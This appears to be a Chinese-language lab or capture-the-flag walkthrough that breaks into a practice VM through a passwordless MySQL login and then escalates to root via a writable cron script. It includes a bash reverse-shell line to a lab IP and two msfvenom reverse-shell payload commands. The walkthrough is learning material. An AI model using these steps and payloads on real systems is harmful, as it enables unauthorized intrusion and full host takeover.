信息收集
主机发现
端口扫描
80 http服务;22 ssh;3306 MySQL。
目录扫描
就一个info.php
漏洞发现及利用
访问80端口:
访问info.php:
给出了phpinfo信息。但是没有什么可以利用的点。
web端其实没什么东西。
访问3306端口,连接MySQL:
直接弱口令(其实没有密码,直接进来。。。。。。)
正常操作,获得账号信息:
获得ssh账号密码。
进行连接:
提权
使用sudo查看suid权限的命令:
使用find命令,查看suid权限:
扫描二维码关注公众号,回复:
13026464 查看本文章
这个环境用不了wget,下载不了一些提权脚本:
查看定时任务:
/etc/crontab
每3分钟以root身份执行脚本。
在脚本中写入反弹shell的命令,以root身份反弹shell:
bash -i >& /dev/tcp/192.168.133.149/7777 0>&1
kali进行监听:
提权成功。
或者使用msfvenon:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.133.149 LPORT=7777
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.133.149 LPORT=7777
总结
web端没有什么利用点,mysql没有密码。。确实没想到。
主要也就是了解了定时任务。